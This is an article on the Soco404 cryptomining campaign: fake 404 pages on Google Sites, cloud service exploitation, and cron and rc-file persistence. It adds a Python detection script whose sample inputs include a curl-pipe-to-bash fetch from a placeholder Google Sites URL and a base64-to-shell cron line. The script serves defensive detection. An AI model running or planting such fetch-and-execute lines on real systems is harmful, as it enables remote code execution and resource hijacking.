The active Soco404 campaign targets cloud environments to deploy cryptomining software.

Researchers from Wiz have uncovered a sophisticated cryptomining campaign, dubbed Soco404, that targets cloud environments by exploiting various vulnerabilities and misconfigurations. The attackers employ a unique method of embedding malicious payloads within fake 404 error pages hosted on Google Sites, demonstrating alarming ingenuity in cloud threat tactics.

Overview of the Soco404 Campaign

Soco404 represents an emerging threat campaign actively compromising cloud systems to deploy cryptominers, specifically focused on mining the privacy-centric cryptocurrency Monero. This campaign exploits a broad range of cloud environment weaknesses, including exposed services and poor configuration settings, to infiltrate both Linux and Windows platforms.

The campaign’s moniker, Soco404, derives from its use of counterfeit 404 error message pages as a vector to deliver encoded malicious payloads. These fake error pages are hosted on legitimate Google Sites domains, leveraging the trusted infrastructure to evade detection and deliver cryptomining software stealthily.

Attack Methodology and Techniques

  • Target Platforms: Both Linux and Windows operating systems are targeted with tailored malware variants optimized for each environment.
  • Exploitation Approach: Soco404 attackers conduct automated reconnaissance to identify vulnerable cloud services such as PostgreSQL databases and Apache Tomcat servers. Common weaknesses include default credentials, misconfigurations, and known unpatched vulnerabilities.
  • Payload Delivery: Malicious payloads are concealed within fake 404 error pages hosted on Google Sites, making the initial infection vector appear innocuous and difficult to identify.
  • Persistence Mechanisms:
    • On Linux hosts, persistence is maintained through cron jobs and alterations to shell resource files (.bashrc, .profile).
    • On Windows hosts, the malware leverages PowerShell scripts to download additional components while disabling logging to reduce forensic visibility.
  • Camouflage: Malicious processes mimic legitimate system services to avoid raising suspicion during routine monitoring.
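As an added defender-side example (not code from the article or from Wiz), a small Python audit that scans the contents of shell resource files and crontabs for the persistence and delivery traits listed above: download-and-execute pipelines, base64 decoded into a shell, and fetches from Google Sites pages. The regular expressions and the sample file contents are constructed assumptions for illustration, not indicators taken from the campaign.

```python
import re
from typing import List, Tuple

# Heuristics for the traits the article describes: rc-file or cron entries
# that fetch and execute remote content, decode embedded base64 into a shell,
# or pull from a Google Sites page (the fake-404 delivery channel).
# These patterns are assumptions, not published indicators.
SUSPICIOUS_PATTERNS = [
    ("download-to-shell", re.compile(r"\b(curl|wget)\b[^|;\n]*\|\s*(ba)?sh\b")),
    ("base64-to-shell", re.compile(r"base64\s+(-d|--decode)[^|;\n]*\|\s*(ba)?sh\b")),
    ("google-sites-fetch", re.compile(r"https?://sites\.google\.com/\S+")),
]

def scan_persistence_text(name: str, content: str) -> List[Tuple[str, int, str]]:
    """Return (source, line_no, rule) for every heuristic a line matches."""
    hits = []
    for no, line in enumerate(content.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines and comments
        for rule, pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(stripped):
                hits.append((name, no, rule))
    return hits

# Constructed sample inputs standing in for ~/.bashrc and a user crontab.
SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
curl -s https://sites.google.com/view/EXAMPLE-PLACEHOLDER/404 | bash
"""
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * echo ZWNobyBoaQ== | base64 -d | sh
"""

def audit_samples() -> List[Tuple[str, int, str]]:
    """Run the scanner over both constructed samples and return all findings."""
    return (scan_persistence_text(".bashrc", SAMPLE_BASHRC)
            + scan_persistence_text("crontab", SAMPLE_CRONTAB))

if __name__ == "__main__":
    for src, no, rule in audit_samples():
        print(f"{src}:{no}: {rule}")
```

On a real host, feed `scan_persistence_text` the contents of each user's rc files and `crontab -l` output, and review any hit against the process list for the mimicked service names mentioned above.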

Impact and Financial Motivation

Infected systems are repurposed to mine Monero, which commandeers cloud computing resources and significantly increases operational costs for the victim organizations. Beyond resource hijacking, some domains linked to the campaign also masquerade as fraudulent cryptocurrency exchanges, suggesting a multifaceted financial fraud infrastructure.

Current Status and Response

Wiz researchers report that Soco404 remains active as of mid-2025, continuously evolving to circumvent detection.
